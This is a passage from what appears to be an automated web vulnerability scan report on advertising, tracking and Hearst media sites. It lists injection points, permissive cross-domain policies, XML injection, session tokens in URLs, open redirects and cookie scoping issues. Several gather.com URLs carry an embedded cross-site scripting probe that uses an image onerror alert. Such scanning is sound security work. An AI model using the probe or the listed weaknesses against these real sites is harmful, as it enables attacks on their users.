4.295. http://r.skimresources.com/api/ [callback parameter]

4.296. http://sb1.analoganalytics.com/publishers/hearst-seattlepi/deal-of-the-day.json [callback parameter]

4.297. http://servedby.flashtalking.com/imp/3/17799 [189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click parameter]

4.298. http://servedby.flashtalking.com/imp/3/17799 [cachebuster parameter]

4.299. http://servedby.flashtalking.com/imp/3/17799 [ftadz parameter]

4.300. http://servedby.flashtalking.com/imp/3/17799 [ftscw parameter]

4.301. http://servedby.flashtalking.com/imp/3/17799 [ftx parameter]

4.302. http://servedby.flashtalking.com/imp/3/17799 [fty parameter]

4.303. http://servedby.flashtalking.com/imp/3/17799 [name of an arbitrarily supplied request parameter]

4.304. http://studio-5.financialcontent.com/hearst [Account parameter]

4.305. http://studio-5.financialcontent.com/hearst [Module parameter]

4.306. http://studio-5.financialcontent.com/hearst [REST URL parameter 1]

4.307. http://studio-5.financialcontent.com/hearst [name of an arbitrarily supplied request parameter]

4.308. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.309. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.310. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.311. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.312. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.313. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.314. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.315. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.316. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

4.317. http://www.addthis.com/api/nai/optout [REST URL parameter 1]

4.318. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

4.319. http://www.addthis.com/api/nai/optout [REST URL parameter 2]

4.320. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

4.321. http://www.addthis.com/api/nai/optout [REST URL parameter 3]

4.322. http://www.addthis.com/api/nai/status [REST URL parameter 1]

4.323. http://www.addthis.com/api/nai/status [REST URL parameter 1]

4.324. http://www.addthis.com/api/nai/status [REST URL parameter 2]

4.325. http://www.addthis.com/api/nai/status [REST URL parameter 2]

4.326. http://www.addthis.com/api/nai/status [REST URL parameter 3]

4.327. http://www.addthis.com/api/nai/status [REST URL parameter 3]

4.328. http://www.answerology.com/index.aspx [topic parameter]

4.329. http://www.answerology.com/index.aspx [topic parameter]

4.330. http://www.chron.com/apps/adWiz/adWiz.mpl [url parameter]

4.331. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]

4.332. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]

4.333. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]

4.334. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.335. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.336. http://www.gather.com/a [REST URL parameter 1]

4.337. http://www.gather.com/a [REST URL parameter 1]

4.338. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.339. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.340. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.341. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.342. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]

4.343. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]

4.344. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;form_id parameter]

4.345. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;lang parameter]

4.346. http://www.kampyle.com/feedback_form/ff-feedback-form.php [name of an arbitrarily supplied request parameter]

4.347. http://www.kampyle.com/feedback_form/ff-feedback-form.php [stats parameter]

4.348. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]

4.349. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]

4.350. http://www.kampyle.com/feedback_form/ff-feedback-form.php [url parameter]

4.351. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utma parameter]

4.352. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmv parameter]

4.353. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmz parameter]

4.354. http://www.local.com/dart/ [css parameter]

4.355. http://www.local.com/dart/ [kw parameter]

4.356. http://www.local.com/dart/ [kw parameter]

4.357. http://www.local.com/dart/ [l parameter]

4.358. http://www.local.com/dart/ [l parameter]

4.359. http://www.local.com/dart/ [ord parameter]

4.360. http://www.local.com/dart/ [ord parameter]

4.361. http://www.local.com/dart/ [p parameter]

4.362. http://www.local.com/dart/ [p parameter]

4.363. http://www.local.com/dart/ [sz parameter]

4.364. http://www.local.com/dart/ [sz parameter]

4.365. http://www.local.com/dart/ [zip parameter]

4.366. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]

4.367. http://www.stamfordadvocatedailydeals.com/widgets/widget [REST URL parameter 2]

4.368. http://adnxs.revsci.net/imp [Referer HTTP header]

4.369. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

4.370. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]

4.371. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]

4.372. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]

4.373. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]

4.374. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]

4.375. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]

4.376. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]

4.377. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]

4.378. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]

4.379. http://contextweb.pixel.invitemedia.com/context_sync [uid cookie]

4.380. http://r.skimresources.com/api/ [skimGUID cookie]

5. Flash cross-domain policy

5.1. http://208.111.153.35/crossdomain.xml

5.2. http://33across.com/crossdomain.xml

5.3. http://a.collective-media.net/crossdomain.xml

5.4. http://a.netmng.com/crossdomain.xml

5.5. http://a.rad.msn.com/crossdomain.xml

5.6. http://a.rfihub.com/crossdomain.xml

5.7. http://a.tribalfusion.com/crossdomain.xml

5.8. http://ad.agkn.com/crossdomain.xml

5.9. http://ad.amgdgt.com/crossdomain.xml

5.10. http://ad.auditude.com/crossdomain.xml

5.11. http://ad.doubleclick.net/crossdomain.xml

5.12. http://ad.turn.com/crossdomain.xml

5.13. http://admin.brightcove.com/crossdomain.xml

5.14. http://admonkey.dapper.net/crossdomain.xml

5.15. http://ads.amgdgt.com/crossdomain.xml

5.16. http://ads.undertone.com/crossdomain.xml

5.17. http://ads.yldmgrimg.net/crossdomain.xml

5.18. http://adserver.teracent.net/crossdomain.xml

5.19. http://adsfac.us/crossdomain.xml

5.20. http://adunit.cdn.auditude.com/crossdomain.xml

5.21. http://afe.specificclick.net/crossdomain.xml

5.22. http://ajax.googleapis.com/crossdomain.xml

5.23. http://amch.questionmarket.com/crossdomain.xml

5.24. http://analytics.newsinc.com/crossdomain.xml

5.25. http://api.zap2it.com/crossdomain.xml

5.26. http://as1.suitesmart.com/crossdomain.xml

5.27. http://assets.newsinc.com/crossdomain.xml

5.28. http://b.rad.msn.com/crossdomain.xml

5.29. http://b.scorecardresearch.com/crossdomain.xml

5.30. http://bh.contextweb.com/crossdomain.xml

5.31. http://bs.serving-sys.com/crossdomain.xml

5.32. http://c.brightcove.com/crossdomain.xml

5.33. http://c.delish.com/crossdomain.xml

5.34. http://c.msn.com/crossdomain.xml

5.35. http://cache.specificmedia.com/crossdomain.xml

5.36. http://cdn.eyewonder.com/crossdomain.xml

5.37. http://cdn.turn.com/crossdomain.xml

5.38. http://ce.lijit.com/crossdomain.xml

5.39. http://cn1.kaboodle.com/crossdomain.xml

5.40. http://cn2.kaboodle.com/crossdomain.xml

5.41. http://cn3.kaboodle.com/crossdomain.xml

5.42. http://content.aggregateknowledge.com/crossdomain.xml

5.43. http://d.agkn.com/crossdomain.xml

5.44. http://dc.kaboodle.com/crossdomain.xml

5.45. http://dis.criteo.com/crossdomain.xml

5.46. http://ds.serving-sys.com/crossdomain.xml

5.47. http://edge.aperture.displaymarketplace.com/crossdomain.xml

5.48. http://edge1.catalog.video.msn.com/crossdomain.xml

5.49. http://edge3.catalog.video.msn.com/crossdomain.xml

5.50. http://event.adxpose.com/crossdomain.xml

5.51. http://events.seattlepi.com/crossdomain.xml

5.52. http://events.stamfordadvocate.com/crossdomain.xml

5.53. http://external.ak.fbcdn.net/crossdomain.xml

5.54. http://eyewond.fcod.llnwd.net/crossdomain.xml

5.55. http://fls.doubleclick.net/crossdomain.xml

5.56. http://g-pixel.invitemedia.com/crossdomain.xml

5.57. http://g.msn.com/crossdomain.xml

5.58. http://goku.brightcove.com/crossdomain.xml

5.59. http://hearst.112.2o7.net/crossdomain.xml

5.60. http://hearstmagazines.112.2o7.net/crossdomain.xml

5.61. http://hfm.checkm8.com/crossdomain.xml

5.62. http://ib.adnxs.com/crossdomain.xml

5.63. http://image.ugo.com/crossdomain.xml

5.64. http://img.widgets.video.s-msn.com/crossdomain.xml

5.65. http://img1.catalog.video.msn.com/crossdomain.xml

5.66. http://img2.catalog.video.msn.com/crossdomain.xml

5.67. http://img3.catalog.video.msn.com/crossdomain.xml

5.68. http://img4.catalog.video.msn.com/crossdomain.xml

5.69. http://js.revsci.net/crossdomain.xml

5.70. http://load.exelator.com/crossdomain.xml

5.71. http://load.tubemogul.com/crossdomain.xml

5.72. http://loadus.exelator.com/crossdomain.xml

5.73. http://media.fastclick.net/crossdomain.xml

5.74. http://metrics.elle.com/crossdomain.xml

5.75. http://metrics.seattlepi.com/crossdomain.xml

5.76. http://nai.btrll.com/crossdomain.xml

5.77. http://o.sa.aol.com/crossdomain.xml

5.78. http://omnituretrack.local.com/crossdomain.xml

5.79. http://optout.collective-media.net/crossdomain.xml

5.80. http://optout.crwdcntrl.net/crossdomain.xml

5.81. http://optout.invitemedia.com:9030/crossdomain.xml

5.82. http://optout.media6degrees.com/crossdomain.xml

5.83. http://p.brilig.com/crossdomain.xml

5.84. http://pbid.pro-market.net/crossdomain.xml

5.85. http://pix04.revsci.net/crossdomain.xml

5.86. http://pixel.adsafeprotected.com/crossdomain.xml

5.87. http://pixel.fetchback.com/crossdomain.xml

5.88. http://pixel.quantserve.com/crossdomain.xml

5.89. http://privacy.revsci.net/crossdomain.xml

5.90. http://ps2.newsinc.com/crossdomain.xml

5.91. http://r.skimresources.com/crossdomain.xml

5.92. http://r.turn.com/crossdomain.xml

5.93. http://rad.msn.com/crossdomain.xml

5.94. http://recs.richrelevance.com/crossdomain.xml

5.95. http://rp.gwallet.com/crossdomain.xml

5.96. http://s.meebocdn.net/crossdomain.xml

5.97. http://s.xp1.ru4.com/crossdomain.xml

5.98. http://s.ytimg.com/crossdomain.xml

5.99. http://s0.2mdn.net/crossdomain.xml

5.100. http://sana.newsinc.com/crossdomain.xml

5.101. http://sb1.analoganalytics.com/crossdomain.xml

5.102. http://secure-us.imrworldwide.com/crossdomain.xml

5.103. http://sensor2.suitesmart.com/crossdomain.xml

5.104. http://shadow01.yumenetworks.com/crossdomain.xml

5.105. http://spe.atdmt.com/crossdomain.xml

5.106. http://studio-5.financialcontent.com/crossdomain.xml

5.107. http://t.invitemedia.com/crossdomain.xml

5.108. http://tags.bluekai.com/crossdomain.xml

5.109. http://tcr.tynt.com/crossdomain.xml

5.110. http://um.simpli.fi/crossdomain.xml

5.111. http://video.od.visiblemeasures.com/crossdomain.xml

5.112. http://vms.msn.com/crossdomain.xml

5.113. http://widget.newsinc.com/crossdomain.xml

5.114. http://www.burstnet.com/crossdomain.xml

5.115. http://www.casalemedia.com/crossdomain.xml

5.116. http://www.kaboodle.com/crossdomain.xml

5.117. http://www.nexac.com/crossdomain.xml

5.118. http://www.zvents.com/crossdomain.xml

5.119. http://www2.glam.com/crossdomain.xml

5.120. http://y.timesunion.com/crossdomain.xml

5.121. http://ad.wsod.com/crossdomain.xml

5.122. http://ads.adbrite.com/crossdomain.xml

5.123. http://as.serving-sys.com/crossdomain.xml

5.124. http://cim.meebo.com/crossdomain.xml

5.125. http://cm.npc-hearst.overture.com/crossdomain.xml

5.126. http://extras.seattlepi.com/crossdomain.xml

5.127. http://fetchback.com/crossdomain.xml

5.128. http://googleads.g.doubleclick.net/crossdomain.xml

5.129. http://login.dotomi.com/crossdomain.xml

5.130. http://o.aolcdn.com/crossdomain.xml

5.131. http://open.ad.yieldmanager.net/crossdomain.xml

5.132. http://origin.chron.com/crossdomain.xml

5.133. http://p.opt.fimserve.com/crossdomain.xml

5.134. http://rd.meebo.com/crossdomain.xml

5.135. http://syndication.mmismm.com/crossdomain.xml

5.136. http://vid.catalog.newsinc.com/crossdomain.xml

5.137. http://www.adadvisor.net/crossdomain.xml

5.138. http://www.adbrite.com/crossdomain.xml

5.139. http://www.delish.com/crossdomain.xml

5.140. http://www.facebook.com/crossdomain.xml

5.141. http://www.fetchback.com/crossdomain.xml

5.142. http://www.gather.com/crossdomain.xml

5.143. http://www.local.com/crossdomain.xml

5.144. http://www.meebo.com/crossdomain.xml

5.145. http://www.misquincemag.com/crossdomain.xml

5.146. http://www.quickandsimple.com/crossdomain.xml

5.147. http://www.realage.com/crossdomain.xml

5.148. http://www.seventeen.com/crossdomain.xml

5.149. http://www.thedailygreen.com/crossdomain.xml

5.150. http://www.ugo.com/crossdomain.xml

5.151. http://www.youtube-nocookie.com/crossdomain.xml

5.152. http://1663.ic-live.com/crossdomain.xml

5.153. http://api.twitter.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://33across.com/clientaccesspolicy.xml

6.2. http://a.rad.msn.com/clientaccesspolicy.xml

6.3. http://ad.doubleclick.net/clientaccesspolicy.xml

6.4. http://adunit.cdn.auditude.com/clientaccesspolicy.xml

6.5. http://b.rad.msn.com/clientaccesspolicy.xml

6.6. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.7. http://c.delish.com/clientaccesspolicy.xml

6.8. http://c.msn.com/clientaccesspolicy.xml

6.9. http://cdn.eyewonder.com/clientaccesspolicy.xml

6.10. http://dc.kaboodle.com/clientaccesspolicy.xml

6.11. http://edge1.catalog.video.msn.com/clientaccesspolicy.xml

6.12. http://edge3.catalog.video.msn.com/clientaccesspolicy.xml

6.13. http://hearst.112.2o7.net/clientaccesspolicy.xml

6.14. http://hearstmagazines.112.2o7.net/clientaccesspolicy.xml

6.15. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml

6.16. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

6.17. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

6.18. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

6.19. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

6.20. http://metrics.elle.com/clientaccesspolicy.xml

6.21. http://metrics.seattlepi.com/clientaccesspolicy.xml

6.22. http://o.aolcdn.com/clientaccesspolicy.xml

6.23. http://o.sa.aol.com/clientaccesspolicy.xml

6.24. http://omnituretrack.local.com/clientaccesspolicy.xml

6.25. http://pixel.quantserve.com/clientaccesspolicy.xml

6.26. http://rad.msn.com/clientaccesspolicy.xml

6.27. http://s0.2mdn.net/clientaccesspolicy.xml

6.28. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

6.29. http://shadow01.yumenetworks.com/clientaccesspolicy.xml

6.30. http://spe.atdmt.com/clientaccesspolicy.xml

6.31. http://video.od.visiblemeasures.com/clientaccesspolicy.xml

6.32. http://vms.msn.com/clientaccesspolicy.xml

6.33. http://y.timesunion.com/clientaccesspolicy.xml

6.34. http://ts3.mm.bing.net/clientaccesspolicy.xml

6.35. http://choice.atdmt.com/clientaccesspolicy.xml

6.36. http://choice.bing.com/clientaccesspolicy.xml

6.37. http://choice.microsoft.com/clientaccesspolicy.xml

6.38. http://choice.msn.com/clientaccesspolicy.xml

7. Cleartext submission of password

8. XML injection

8.1. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 1]

8.2. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 2]

8.3. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 3]

8.4. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js [REST URL parameter 4]

8.5. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php [REST URL parameter 1]

8.6. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [REST URL parameter 1]

8.7. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]

8.8. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]

8.9. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 1]

8.10. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]

8.11. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

8.12. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

8.13. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 1]

8.14. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 2]

8.15. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 3]

8.16. http://amch.questionmarket.com/dt/s/28067/0.php [REST URL parameter 4]

8.17. http://amch.questionmarket.com/static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf [REST URL parameter 1]

8.18. http://amch.questionmarket.com/static/1000_arrow_safecount_li-350x250-1l-eng-usd.swf [REST URL parameter 2]

8.19. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 1]

8.20. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php [REST URL parameter 2]

8.21. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 1]

8.22. http://hearst.com/about-hearst/corporate-mark-e-aldam.php [REST URL parameter 2]

8.23. http://hearst.com/about-hearst/index.php [REST URL parameter 1]

8.24. http://hearst.com/about-hearst/index.php [REST URL parameter 2]

8.25. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 1]

8.26. http://hearst.com/flash/slideshow-newspapers.swf [REST URL parameter 2]

8.27. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 1]

8.28. http://hearst.com/newspapers/albany-times-union.php [REST URL parameter 2]

8.29. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 1]

8.30. http://hearst.com/newspapers/hearst-news-service.php [REST URL parameter 2]

8.31. http://hearst.com/newspapers/index.php [REST URL parameter 1]

8.32. http://hearst.com/newspapers/index.php [REST URL parameter 2]

8.33. http://hearst.com/newspapers/localedge.php [REST URL parameter 1]

8.34. http://hearst.com/newspapers/localedge.php [REST URL parameter 2]

8.35. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 1]

8.36. http://hearst.com/newspapers/metrix4media.php [REST URL parameter 2]

8.37. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 1]

8.38. http://hearst.com/newspapers/seattlepicom.php [REST URL parameter 2]

8.39. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 1]

8.40. http://hearst.com/newspapers/the-advocate.php [REST URL parameter 2]

8.41. http://hearst.com/press-room/index.php [REST URL parameter 1]

8.42. http://hearst.com/press-room/index.php [REST URL parameter 2]

8.43. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 1]

8.44. http://hearst.com/press-room/pr-20110817a.php [REST URL parameter 2]

8.45. http://img.widgets.video.s-msn.com/resource.aspx [responseEncoding parameter]

8.46. http://js.bizographics.com/show_ad.js [REST URL parameter 1]

8.47. http://load.exelator.com/load/OptOut.php [REST URL parameter 1]

8.48. http://load.exelator.com/load/OptOut.php [REST URL parameter 2]

8.49. http://loadus.exelator.com/load/ [REST URL parameter 1]

8.50. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 1]

8.51. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 2]

8.52. http://origin.chron.com/apps/audit/ads.gif [REST URL parameter 3]

8.53. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]

8.54. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]

8.55. http://pixel.quantserve.com/optout_set [REST URL parameter 1]

8.56. http://pixel.quantserve.com/optout_status [REST URL parameter 1]

8.57. http://pixel.quantserve.com/optout_verify [REST URL parameter 1]

8.58. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]

8.59. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]

8.60. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]

8.61. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]

8.62. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]

8.63. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

8.64. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

8.65. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

8.66. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 1]

8.67. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 2]

8.68. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 3]

8.69. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 2]

8.70. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 3]

8.71. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]

8.72. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]

8.73. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 1]

8.74. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 2]

8.75. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 3]

8.76. http://widget.newsinc.com/ndn_toppicks.html [REST URL parameter 1]

8.77. http://www.nexac.com/nai_optout.php [REST URL parameter 1]

8.78. http://www.nexac.com/nai_status.php [REST URL parameter 1]

9. Session token in URL

9.1. http://a.netmng.com/hic/

9.2. http://advertising.aol.com/nai/nai.php

9.3. http://bh.contextweb.com/bh/set.aspx

9.4. http://info.yahoo.com/nai/nai-status.html

9.5. http://info.yahoo.com/nai/nai-verify.html

9.6. http://info.yahoo.com/nai/optout.html

9.7. http://l.sharethis.com/pview

9.8. http://nai.ad.us-ec.adtechus.com/nai/daa.php

9.9. http://nai.adserver.adtechus.com/nai/daa.php

9.10. http://nai.adserverec.adtechus.com/nai/daa.php

9.11. http://nai.adserverwc.adtechus.com/nai/daa.php

9.12. http://nai.adsonar.com/nai/daa.php

9.13. http://nai.adtech.de/nai/daa.php

9.14. http://nai.advertising.com/nai/daa.php

9.15. http://nai.glb.adtechus.com/nai/daa.php

9.16. http://nai.tacoda.at.atwola.com/nai/daa.php

9.17. http://rs.gwallet.com/r1/pixel/x1743

9.18. http://www.facebook.com/extern/login_status.php

9.19. http://www.meebo.com/mcmd/events

9.20. http://www.meebo.com/mcmd/subscribe

9.21. http://www.networkadvertising.org/managing/optout_results.asp

9.22. http://www.networkadvertising.org/yahoo_handler

9.23. http://www.realage.com/

10. Password field submitted using GET method

11. Open redirection

11.1. http://a.tribalfusion.com/z/i.optout [success parameter]

11.2. http://a1.interclick.com/CookieCheck.aspx [optOut parameter]

11.3. http://a1.interclick.com/optOut.aspx [fail parameter]

11.4. http://login.dotomi.com/ucm/UCMController [redir_url parameter]

11.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]

11.6. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]

11.7. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]

11.8. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]

11.9. http://nai.adsonar.com/nai/daa.php [rd parameter]

11.10. http://nai.adtech.de/nai/daa.php [rd parameter]

11.11. http://nai.advertising.com/nai/daa.php [rd parameter]

11.12. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]

11.13. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]

11.14. http://optout.crwdcntrl.net/optout [d parameter]

11.15. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://optout.mookie1.com/optout/nai/

12.3. http://www.gather.com/URI%20SYNTAX%20EXCEPTION

12.4. http://a.collective-media.net/

12.5. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default

12.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home

12.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home

12.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo

12.9. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default

12.10. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home

12.11. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home

12.12. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo

12.13. http://a.collective-media.net/datapair

12.14. http://a.collective-media.net/favicon.ico

12.15. http://a.netmng.com/hic/

12.16. http://a.netmng.com/opt-out.php

12.17. http://a.raasnet.com/a

12.18. http://a.rfihub.com/nai_opt_out_1.gif

12.19. http://a.tribalfusion.com/j.ad

12.20. http://a.tribalfusion.com/z/i.optout

12.21. http://ad.agkn.com/iframe!t=1089!

12.22. http://ad.auditude.com/adserver

12.23. http://ad.auditude.com/adserver

12.24. http://ad.auditude.com/adserver

12.25. http://ad.auditude.com/adserver

12.26. http://ad.auditude.com/adserver

12.27. http://ad.auditude.com/adserver

12.28. http://ad.auditude.com/adserver

12.29. http://ad.auditude.com/adserver

12.30. http://ad.auditude.com/adserver

12.31. http://ad.auditude.com/adserver

12.32. http://ad.auditude.com/adserver

12.33. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4

12.34. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87

12.35. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88

12.36. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2

12.37. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206

12.38. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

12.39. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30

12.40. http://ad.doubleclick.net/adj/DY146/ron_lifestyle

12.41. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3

12.42. http://ad.doubleclick.net/adj/hdm.answerology/

12.43. http://ad.doubleclick.net/adj/hdm.donatemydress/

12.44. http://ad.doubleclick.net/adj/hdm.misquincemag/other/

12.45. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/

12.46. http://ad.doubleclick.net/adj/hdm.quicksimple/other/

12.47. http://ad.doubleclick.net/adj/hdm.seventeen/other/

12.48. http://ad.doubleclick.net/adj/hdm.thedailygreen/other/

12.49. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage

12.50. http://ad.doubleclick.net/adj/locm.hp

12.51. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome

12.52. http://ad.wsod.com/

12.53. http://ads.adbrite.com/adserver/vdi/762701

12.54. http://ads.amgdgt.com/ads/opt-out

12.55. http://adserver.teracent.net/tase/ad

12.56. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew

12.57. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew

12.58. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew

12.59. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew

12.60. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew

12.61. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew

12.62. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew

12.63. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php

12.64. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php

12.65. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php

12.66. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php

12.67. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

12.68. http://api.aggregateknowledge.com/optout2

12.69. http://api.agkn.com/optout2

12.70. http://api.choicestream.com/instr/crunch/almondnet/seg

12.71. http://apis.google.com/js/plusone.js

12.72. http://ats.tumri.net/ats/optout

12.73. http://b.scorecardresearch.com/b

12.74. http://b.scorecardresearch.com/p

12.75. http://b.scorecardresearch.com/r

12.76. http://bh.contextweb.com/bh/rtset

12.77. http://bh.contextweb.com/bh/set.aspx

12.78. http://ce.lijit.com/merge

12.79. http://cm.npc-hearst.overture.com/js_1_0/

12.80. http://d.agkn.com/iframe!t=747!

12.81. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/

12.82. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

12.83. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9

